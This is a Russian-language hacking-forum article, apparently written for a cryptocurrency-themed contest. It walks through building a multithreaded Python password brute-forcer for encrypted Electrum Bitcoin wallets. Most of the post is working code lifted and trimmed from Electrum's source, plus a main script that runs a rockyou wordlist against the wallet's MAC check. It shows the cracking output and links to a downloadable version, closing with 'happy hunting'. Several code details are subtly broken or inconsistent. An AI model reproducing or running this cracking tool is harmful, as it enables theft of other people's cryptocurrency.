• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Вскрываем encrypted Electrum Wallets методом грубой силы

baykal

(L2) cache
Пользователь
Регистрация
16.03.2021
Сообщения
370
Реакции
839
BruteForce encrypted Electum Wallets. Python coding. Have Fun!

Доброго времени суток, дорогие форумчане! Я не силен в написании статей и никогда не работал журналистом, поэтому, предположительно, статья не будет произведением литературного искусства, но мне это и не нужно, моя цель - донести до вас техническую часть как можно прозрачнее. Мы проведем небольшое исследование Electrum Bitcoin Wallet (далее EBW), а именно:
  • Мое любимое: будем кодить, разбирать исходный код EBW;
  • Сделаем многопоточный брутфорсер для вскрытия кошельков Electrum на Python3;
  • Ну и, конечно же, протестируем все это дело
Если Вы решили, что данная тема будет интересна для Вас, тогда - приступим. Сварите свой любимый кофе и поехали ...

PS: Я буду использовать OS Ubuntu 18.04, Python 3.6.9, Sublime Text 3 для разработки нашего брутфорсера.

1. Создание проекта

Для начала скачаем Electrum-4.x.x.tar.gz (https://electrum.org/panel-download.html) python source и распакуем (я буду использовать версию 4.1.2):
Код:
cd ~/Downloads && tar -xf Electrum-4.1.2.tar.gz && cd Electrum-4.x.x && ls -w1
И имеем:
Код:
AUTHORS
contrib
electrum
electrum.desktop
Electrum.egg-info
LICENCE
MANIFEST.in
packages
PKG-INFO
README.rst
RELEASE-NOTES
run_electrum
setup.cfg
setup.py
Для проекта нам понадобится только содержимое директории "electrum". В данной директории содержится весь, нужный нам python код который мы будем использовать для построения нашего брутфорсера.
Давайте создадим рабочую директорию:
Код:
mkdir ~/EBW_bf
mkdir ~/EBW_bf/src
cp -r ~/Downloads/Electrum-4.1.2/electrum ~/EBW_bf/
cd ~/EBW_bf
Будем работать в виртуальном python-окруженни, поэтому в директории с поектом сделаем следующее:
Код:
python3 -m venv ./venv && source ./venv/bin/activate
PS: Я обращаюсь python модулям через -m, т.к. для меня интуитивно понятнее к какой версии python я обращаюсь.

Все подготовлено, можно приступать к написанию кода, а вернее к копипасту из исходников Electrum. Для начала ознакомимся с самим процессом расшифровки кошелка, я обозначу ее в виде схемы:
Dai6JMX.png

2. Кодинг
Начнем с main.py

Здесь нам понадобится класс WalletStorage, который и будет содержать методы расшифровки нашего кошелька. Я буду игнорировать ненужные нам методы, т.к. мы сосредоточимся только на проверке пароля. Чтобы понять, как организована инициализация кошелька в Electrum обратимся к electrum/storage.py, а конкретно, к классу WalletStorage. При проверке пароля (ключа) Electrum инициализирует класс WalletStorage и вызывает из него метод check_password(), который вызывает метот decrypt(). Так.. не очень понятно, как мне кажется. Давайте запишем эту конструкцию псевдокодом для большей ясности:
Код:
init class WalletStorage('path_to_walet') --> check_password(password) --> decrypt(password)
Более-менее...
В итоге я пришел к такому началу:
Код:
import hashlib
import sys
import os

from src import ecc

class WalletStorage(object):
    def __init__(self, path):
        
        self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
        self._file_exists = bool(self.path and os.path.exists(self.path))
        self.pubkey = None
        self.decrypted = ''

        with open(self.path, "r", encoding='utf-8') as f:
            self.raw = f.read()

    def _get_encryption_magic(self):
        return b'BIE1'

    def decrypt(self, password) -> None:
        ec_key = self.get_eckey_from_password(password)
        
        s = False
        if self.raw:
            enc_magic = self._get_encryption_magic()
            s = ec_key.decrypt_message(self.raw, enc_magic)
        if s:
            print('[+] %s' % password)

    def check_password(self, password) -> None:
        self.decrypt(password)

    @staticmethod
    def get_eckey_from_password(password):
        secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
        ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)

        return ec_key

def main():

    # get wallet name for args
    wallet_name = None
    if len(sys.argv) != 2:
        print('Usage: %s <wallet_name>' % sys.argv[0])
        exit()
    else:
        wallet_name = sys.argv[1]
        if not os.path.exists(wallet_name):
            print('Wallet not found in current directory.')
            exit()

    # init wallet
    wallet = WalletStorage(wallet_name)

    for password in ['test1', 'passwordTest2']:
        wallet.check_password(password)

if __name__ == "__main__":
    main = main()
Метод decrypt использует следующие методы:
1) get_eckey_from_password - получение EC_KEY из секрета. Метод возвращает объект класса ECPrivkey к которому мы обратимся позже.
2) get_encryption_magic - получение способа шифрования (пароль, ключ и пр). Можете заметить, что я сократил этот метод до return b'BIE1', т.к буду рассматривать только способ шифрования по паролю. BIE1 - первые 4 символа кошелька, отвечающие за способ шифрования (сделайте base64 decode если не доверяете)

Следующим шагом рассмотрим методы класса ECPrivkey, а конкретно, метода decrypt_message, который и даст нам желаемое ДА или НЕТ при проверке пароля. Начнем по-порядку: первым у нас вызывается метод decrypt(password)--> get_eckey_from_password(password) который обращается к методу ecc.ECPrivkey.from_arbitrary_size_secret(secret)

Давайте создадим файл ecc.py в рабочей директории src, который и будет содержать класс ECPrivkey:

PS: я соблюдаю аналогичные обазначения имен файлов с проектом electrum, что бы не возникло путаницы.

должно получится так:
Код:
electrum
venv
main.py
src
├── ecc.py
└── __init__.py
В __init__.py обозначим наш ecc.py
__init__.py
Код:
from . import ecc
Приступим к формированию ecc.py: на этом этапе нам понадобятся классы ECPubkey и ECPrivkey с необходимым для наших целей набором методов.

Первым делом, у нас вызвается статичный метод класса: ECPrivkey.from_arbitrary_size_secret(secret), давайте посмотрим что там происходит: обратимся к electrum/ecc.py

Опять все запутанно... давайте запишем в читабельном виде:
Код:
from_arbitrary_size_secret() --> init class ECPrivkey(какой-то скаляр) --> init class ECPubkey(что-то нечеловеческое).
Т.е. статичный метод from_arbitrary_size_secret инициализирует класс ECPrivkey, кторый в свою очередь при инициализации инициализирует класс ECPubkey (GENERATOR).

Давайте все оформим:

ecc.py
Код:
from typing import Union, Tuple, Optional
from ctypes import (
    byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
    CFUNCTYPE, POINTER, cast
)
import base64
import hashlib

from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot

def string_to_number(b: bytes) -> int:
    return int.from_bytes(b, byteorder='big', signed=False)

def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
    if isinstance(secret, bytes):
        secret = string_to_number(secret)
    return 0 < secret < CURVE_ORDER

def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
    assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
    
    pubkey_ptr = create_string_buffer(64)
    ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
        _libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
    if not ret:
        raise InvalidECPointException('public key could not be parsed or is invalid')

    pubkey_serialized = create_string_buffer(65)
    pubkey_size = c_size_t(65)
    _libsecp256k1.secp256k1_ec_pubkey_serialize(
        _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
    pubkey_serialized = bytes(pubkey_serialized)
    assert pubkey_serialized[0] == 0x04, pubkey_serialized
    x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
    y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
    return x, y

class ECPubkey(object):
    
    def __init__(self, b: Optional[bytes]):
        if b is not None:
            assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
            if isinstance(b, bytearray):
                b = bytes(b)
            self._x, self._y = _x_and_y_from_pubkey_bytes(b)
        else:
            self._x, self._y = None, None

    def is_at_infinity(self):
        return self == POINT_AT_INFINITY

    def x(self) -> int:
        return self._x

    def y(self) -> int:
        return self._y

    def get_public_key_bytes(self, compressed=True):
        if self.is_at_infinity(): raise Exception('point is at infinity')
        x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
        y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
        if compressed:
            header = b'\x03' if self.y() & 1 else b'\x02'
            return header + x
        else:
            header = b'\x04'
            return header + x + y

    def _to_libsecp256k1_pubkey_ptr(self):
        pubkey = create_string_buffer(64)
        public_pair_bytes = self.get_public_key_bytes(compressed=False)
        ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
            _libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
        if not ret:
            raise Exception('public key could not be parsed or is invalid')
        return pubkey

    @classmethod
    def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
        pubkey_serialized = create_string_buffer(65)
        pubkey_size = c_size_t(65)
        _libsecp256k1.secp256k1_ec_pubkey_serialize(
            _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
        return ECPubkey(bytes(pubkey_serialized))

    def __mul__(self, other: int):
        
        if not isinstance(other, int):
            raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))

        other %= CURVE_ORDER
        
        if self.is_at_infinity() or other == 0:
            return POINT_AT_INFINITY

        pubkey = self._to_libsecp256k1_pubkey_ptr()

        ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
        
        if not ret:
            return POINT_AT_INFINITY

        return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)

CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
                                   '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)

class ECPrivkey(ECPubkey):
    def __init__(self, privkey_bytes: bytes):
        
        assert_bytes(privkey_bytes)
        if len(privkey_bytes) != 32:
            raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
    
        secret = string_to_number(privkey_bytes)

        if not is_secret_within_curve_range(secret):
            raise InvalidECPointException('Invalid secret scalar (not within curve order)')
        self.secret_scalar = secret

        pubkey = GENERATOR * secret

        super().__init__(pubkey.get_public_key_bytes(compressed=False))

    @classmethod
    def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
        return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))

    @classmethod
    def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
        scalar = string_to_number(privkey_bytes) % CURVE_ORDER
        if scalar == 0:
            raise Exception('invalid EC private key scalar: zero')
        privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
        return privkey_32bytes

    def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:
        
        encrypted = base64.b64decode(encrypted)
        if len(encrypted) < 85:
            return False
        
        magic_found = encrypted[:4]
        ephemeral_pubkey_bytes = encrypted[4:37]
        ciphertext = encrypted[37:-32]
        mac = encrypted[-32:]
        if magic_found != magic:
            return False
        try:
            ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
        
        except InvalidECPointException as e:
            return False
        
        ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
        key = hashlib.sha512(ecdh_key).digest()
        iv, key_e, key_m = key[0:16], key[16:32], key[32:]

        if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
            return False
        else:
            return True
Здесь мы обращаемся к:
  • assert_bytes() из electrum/util.py
  • _libsecp256k1, SECP256K1_EC_UNCOMPRESSED из electrum/ecc_fast.py (Библиотека C для сигнатур ECDSA и операций с секретным/открытым ключом на кривой secp256k1)
  • hmac_oneshot() из electrum/crypto.py
Давайте их позаимствуем из соответствующих electrum/* py-файлов:
создаем в директории src: util.py, ecc_fast.py, crypto.py соответственно.

И теперь наш __init__.py примет следующий вид:

__init__.py
Код:
from . import ecc
from . import util
from . import ecc_fast
from . import crypto
Дальше я подумал за Вас и оставил все самое необходимое из кучи ненужного кода:

ecc_fast.py
Python:
import os
import sys
import ctypes
from ctypes import (
    byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
    CFUNCTYPE, POINTER, cast
)

SECP256K1_FLAGS_TYPE_MASK = ((1 << 8) - 1)
SECP256K1_FLAGS_TYPE_CONTEXT = (1 << 0)
SECP256K1_FLAGS_TYPE_COMPRESSION = (1 << 1)
# /** The higher bits contain the actual data. Do not use directly. */
SECP256K1_FLAGS_BIT_CONTEXT_VERIFY = (1 << 8)
SECP256K1_FLAGS_BIT_CONTEXT_SIGN = (1 << 9)
SECP256K1_FLAGS_BIT_COMPRESSION = (1 << 8)

# /** Flags to pass to secp256k1_context_create. */
SECP256K1_CONTEXT_VERIFY = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_VERIFY)
SECP256K1_CONTEXT_SIGN = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_SIGN)
SECP256K1_CONTEXT_NONE = (SECP256K1_FLAGS_TYPE_CONTEXT)

SECP256K1_EC_COMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION | SECP256K1_FLAGS_BIT_COMPRESSION)
SECP256K1_EC_UNCOMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION)


class LibModuleMissing(Exception): pass


def load_library()

    library_paths = ['/usr/lib/libsecp256k1.so.0']

    exceptions = []
    secp256k1 = None
    for libpath in library_paths:
        try:
            secp256k1 = ctypes.cdll.LoadLibrary(libpath)
        except BaseException as e:
            exceptions.append(e)
        else:
            break
    if not secp256k1:
        print(f'libsecp256k1 library failed to load. exceptions: {repr(exceptions)}')
        return None

    try:
        secp256k1.secp256k1_context_create.argtypes = [c_uint]
        secp256k1.secp256k1_context_create.restype = c_void_p

        secp256k1.secp256k1_context_randomize.argtypes = [c_void_p, c_char_p]
        secp256k1.secp256k1_context_randomize.restype = c_int

        secp256k1.secp256k1_ec_pubkey_create.argtypes = [c_void_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_create.restype = c_int

        secp256k1.secp256k1_ecdsa_sign.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p, c_void_p, c_void_p]
        secp256k1.secp256k1_ecdsa_sign.restype = c_int

        secp256k1.secp256k1_ecdsa_verify.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_verify.restype = c_int

        secp256k1.secp256k1_ec_pubkey_parse.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_parse.restype = c_int

        secp256k1.secp256k1_ec_pubkey_serialize.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p, c_uint]
        secp256k1.secp256k1_ec_pubkey_serialize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_parse_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_normalize.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_normalize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_der.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ecdsa_signature_parse_der.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_der.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_der.restype = c_int

        secp256k1.secp256k1_ec_pubkey_tweak_mul.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_tweak_mul.restype = c_int

        secp256k1.secp256k1_ec_pubkey_combine.argtypes = [c_void_p, c_char_p, c_void_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_combine.restype = c_int

        # --enable-module-recovery
        try:
            secp256k1.secp256k1_ecdsa_recover.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
            secp256k1.secp256k1_ecdsa_recover.restype = c_int

            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p, c_int]
            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.restype = c_int
        except (OSError, AttributeError):
            raise LibModuleMissing('libsecp256k1 library found but it was built '
                                   'without required module (--enable-module-recovery)')

        secp256k1.ctx = secp256k1.secp256k1_context_create(SECP256K1_CONTEXT_SIGN | SECP256K1_CONTEXT_VERIFY)
        ret = secp256k1.secp256k1_context_randomize(secp256k1.ctx, os.urandom(32))
        if not ret:
            print('secp256k1_context_randomize failed')
            return None

        return secp256k1
    except (OSError, AttributeError) as e:
        print(f'libsecp256k1 library was found and loaded but there was an error when using it: {repr(e)}')
        return None


_libsecp256k1 = None
try:
    _libsecp256k1 = load_library()
except BaseException as e:
    print(f'failed to load libsecp256k1: {repr(e)}')


if _libsecp256k1 is None:
    # hard fail:
    sys.exit(f"Error: Failed to load libsecp256k1.")
Обязательно измените путь к libsecp256k1! Он представлен в виде списка в методе load_library()
Стоит отметить, т.к. я пишу брут под Ubuntu то для обнаружения libsecp256k1 я оставил единственный путь:
Python:
library_paths = ['/usr/lib/x86_64-linux-gnu/libsecp256k1.so.0']
PS: Чтобы найти libsecp256k1.so.0 на вашей системе воспользуйтесь утилитой find:
Python:
find /usr/ -iname "libsecp256k1.so.0"

util.py
Python:
def assert_bytes(*args):
    """
    porting helper, assert args type
    """
    try:
        for x in args:
            assert isinstance(x, (bytes, bytearray))
    except:
        print('assert bytes failed', list(map(type, args)))
        raise

crypto.py
Python:
import hmac

from src.util import assert_bytes

def hmac_oneshot(key: bytes, msg: bytes, digest) -> bytes:
    if hasattr(hmac, 'digest'):
        # requires python 3.7+; faster
        return hmac.digest(key, msg, digest)
    else:
        return hmac.new(key, msg, digest).digest()
Готово! Осталось разобраться с пока что не очень понятным ecc.py

Продублирую дабы Вам не скролить:

ecc.py
Python:
from typing import Union, Tuple, Optional
from ctypes import (
    byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
    CFUNCTYPE, POINTER, cast
)
import base64
import hashlib

from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot

def string_to_number(b: bytes) -> int:
    return int.from_bytes(b, byteorder='big', signed=False)

def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
    if isinstance(secret, bytes):
        secret = string_to_number(secret)
    return 0 < secret < CURVE_ORDER

def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
    assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
    
    pubkey_ptr = create_string_buffer(64)
    ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
        _libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
    if not ret:
        raise InvalidECPointException('public key could not be parsed or is invalid')

    pubkey_serialized = create_string_buffer(65)
    pubkey_size = c_size_t(65)
    _libsecp256k1.secp256k1_ec_pubkey_serialize(
        _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
    pubkey_serialized = bytes(pubkey_serialized)
    assert pubkey_serialized[0] == 0x04, pubkey_serialized
    x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
    y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
    return x, y

class ECPubkey(object):
    
    def __init__(self, b: Optional[bytes]):
        if b is not None:
            assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
            if isinstance(b, bytearray):
                b = bytes(b)
            self._x, self._y = _x_and_y_from_pubkey_bytes(b)
        else:
            self._x, self._y = None, None

    def is_at_infinity(self):
        return self == POINT_AT_INFINITY

    def x(self) -> int:
        return self._x

    def y(self) -> int:
        return self._y

    def get_public_key_bytes(self, compressed=True):
        if self.is_at_infinity(): raise Exception('point is at infinity')
        x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
        y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
        if compressed:
            header = b'\x03' if self.y() & 1 else b'\x02'
            return header + x
        else:
            header = b'\x04'
            return header + x + y

    def _to_libsecp256k1_pubkey_ptr(self):
        pubkey = create_string_buffer(64)
        public_pair_bytes = self.get_public_key_bytes(compressed=False)
        ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
            _libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
        if not ret:
            raise Exception('public key could not be parsed or is invalid')
        return pubkey

    @classmethod
    def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
        pubkey_serialized = create_string_buffer(65)
        pubkey_size = c_size_t(65)
        _libsecp256k1.secp256k1_ec_pubkey_serialize(
            _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
        return ECPubkey(bytes(pubkey_serialized))

    def __mul__(self, other: int):
        
        if not isinstance(other, int):
            raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))

        other %= CURVE_ORDER
        
        if self.is_at_infinity() or other == 0:
            return POINT_AT_INFINITY

        pubkey = self._to_libsecp256k1_pubkey_ptr()

        ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
        
        if not ret:
            return POINT_AT_INFINITY

        return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)

CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
                                   '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)

class ECPrivkey(ECPubkey):
    def __init__(self, privkey_bytes: bytes):
        
        assert_bytes(privkey_bytes)
        if len(privkey_bytes) != 32:
            raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
    
        secret = string_to_number(privkey_bytes)

        if not is_secret_within_curve_range(secret):
            raise InvalidECPointException('Invalid secret scalar (not within curve order)')
        self.secret_scalar = secret

        pubkey = GENERATOR * secret

        super().__init__(pubkey.get_public_key_bytes(compressed=False))

    @classmethod
    def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
        return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))

    @classmethod
    def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
        scalar = string_to_number(privkey_bytes) % CURVE_ORDER
        if scalar == 0:
            raise Exception('invalid EC private key scalar: zero')
        privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
        return privkey_32bytes

    def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:

        encrypted = base64.b64decode(encrypted)
        if len(encrypted) < 85:
            return False
        
        magic_found = encrypted[:4]
        ephemeral_pubkey_bytes = encrypted[4:37]
        ciphertext = encrypted[37:-32]
        mac = encrypted[-32:]
        if magic_found != magic:
            return False
        try:
            ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
        except:
            return False
        
        ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
        key = hashlib.sha512(ecdh_key).digest()
        iv, key_e, key_m = key[0:16], key[16:32], key[32:]

        if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
            return False
        else:
            return True
Создание публичного ключа берет свое начало с
Код:
pubkey = GENERATOR * secret

Переменная GENERATOR есть ECPubkey(bytes.fromhex('...')). т.е. прототип класса ECPubkey. Чтобы выполнить умножение ECPubkey на int, нужно учесть наличие метода __mul__ (multiplication) в классе ECPubkey.

Теперь разберем долгожданнй метод decrypt_message(), который вызывается в main.py и должен вернуть нам результат. На этом этапе стоит отметить, что у нас уже инициализованы классы ECPubkey и ECPrivkey ранее (держите это в голове)
Python:
def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:

encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
return False

magic_found = encrypted[:4]
ephemeral_pubkey_bytes = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic_found != magic:
return False

try:
ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
except:
return False

ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]

# здесь мы оставим только return False если пароль не соответствует искомому и return False в противном случае.
if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
return False
else:
return True
Здесь мы видим, как наш кошелек рвется на куски, далее следуют магические вычесления на основании ephemeral_pubkey (временный публичный ключ) и в завершении если mac не равна hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256) то "следующий пароль пжалста". Ну вот мы и почти у финиша, остается все это дело завернуть в многопоточность и потестировать.

Для достижения многопоточности будем использовать ThreadExecutorPool (кому как, а я просто привык с ней работать). Чтобы не перегружать и без того занятую память, будем читать файл с паролями построчно, а не грузить все их в память.

Вот что я предлагаю:
Python:
que = []
with open(file_with_password, 'r', errors='replace') as fd:
    for password in fd:
        password = password.rstrip()
        que.append(password)

        if len(que) == 1000:
            with ThreadPoolExecutor(max_workers=4) as pool:
                        pool.map(worker, que)
        que = []

if len(que) > 0:
    with ThreadPoolExecutor(max_workers=4) as pool:
        pool.map(worker, que)
Добавим прогресс бар: для этого установим удобный пакет tqdm:
Код:
python3 -m pip install tqdm
Здесь стоит отметить, что нам придется перед началом перебора паролей узнать общее кол-во паролей в словаре, для отображения прогресса.

В итоге у нас получится что-то то такое:

main.py
Python:
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
import hashlib
import sys
import os

from src import ecc

class WalletStorage(object):
    def __init__(self, path):
        
        self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
        self._file_exists = bool(self.path and os.path.exists(self.path))
        self.pubkey = None
        self.decrypted = ''

        with open(self.path, "r", encoding='utf-8') as f:
            self.raw = f.read()

    def _get_encryption_magic(self):
        return b'BIE1'

    def decrypt(self, password) -> None:
        ec_key = self.get_eckey_from_password(password)
        
        s = False
        if self.raw:
            enc_magic = self._get_encryption_magic()
            s = ec_key.decrypt_message(self.raw, enc_magic)
        if s:
            print()
            print('[+] %s' % password)
            exit()

    def check_password(self, password) -> None:
        global PBAR
        
        self.decrypt(password)
        PBAR.update(1)

    @staticmethod
    def get_eckey_from_password(password):
        secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
        ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)

        return ec_key

def main():

    global PBAR

    # get wallet name for args
    wallet_name = None
    if len(sys.argv) != 2:
        print('Usage: %s <wallet_name>' % sys.argv[0])
        exit()
    else:
        wallet_name = sys.argv[1]
        if not os.path.exists(wallet_name):
            print('Wallet not found in current directory.')
            exit()

    # init wallet
    wallet = WalletStorage(wallet_name)

    print('loading dict ...')
    dict_len = 0
    with open('rockyou.txt', 'r', errors='replace') as fd:
        for line in fd:
            dict_len += 1

    print('starting...')
    print()
    
    PBAR = tqdm(total=dict_len)

    que = []
    with open('rockyou.txt', 'r', errors='replace') as fd:
        for password in fd:
            password = password.rstrip()
            que.append(password)

            if len(que) == 1000:
                with ThreadPoolExecutor(max_workers=4) as pool:
                        pool.map(wallet.check_password, que)
                que = []

    if len(que) > 0:
        with ThreadPoolExecutor(max_workers=4) as pool:
            pool.map(wallet.check_password, que)

if __name__ == "__main__":
    main = main()
И такое:
Код:
venv
electrum
rockyou.txt
main.py
src
├── crypto.py
├── ecc_fast.py
├── ecc.py
├── __init__.py
└── util.py

3. Тестируем!

В качестве словаря будем использовать всем известный rockyou.

Создадим кошелек с простеньким паролем (у меня это password123), скопируем его в рабочую директорию и начнем тестировать.

PS: поставьте для тестирования пароль который есть в словаре. Наша задача убедится в корректности работы скрипта, а потом уже делайте все что душе угодно.
Код:
cp ~/.electrum/wallets/test_wallet ~/EBW_bf
python3 main.py test_wallet
ПК шумит, а мы просто ждем :)
Код:
loading dict ...
starting...

 38%|█████████                | 5491654/14344324 [6489.81it/s]
[+] testpassword123
PwN! Результат не заставил себя долго ждать. Надеюсь в этой статье Вы что-то подчеркнули для себя и будете использовать полученные знания в дальнейшем (естественно в благих целях). Всем успешной охоты!

Ссылка на реализацию: https://mega.nz/file/CkMHGSpD#rtkiwcI0vJeRtHOJl0mBmKfPAyZ9XPZsUdlM3ynh1uY

Статья написана в рамках конкурса "Криптовалютный конкурс статей!" для exploit.in
Источник
Автор: @alex_X40s
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх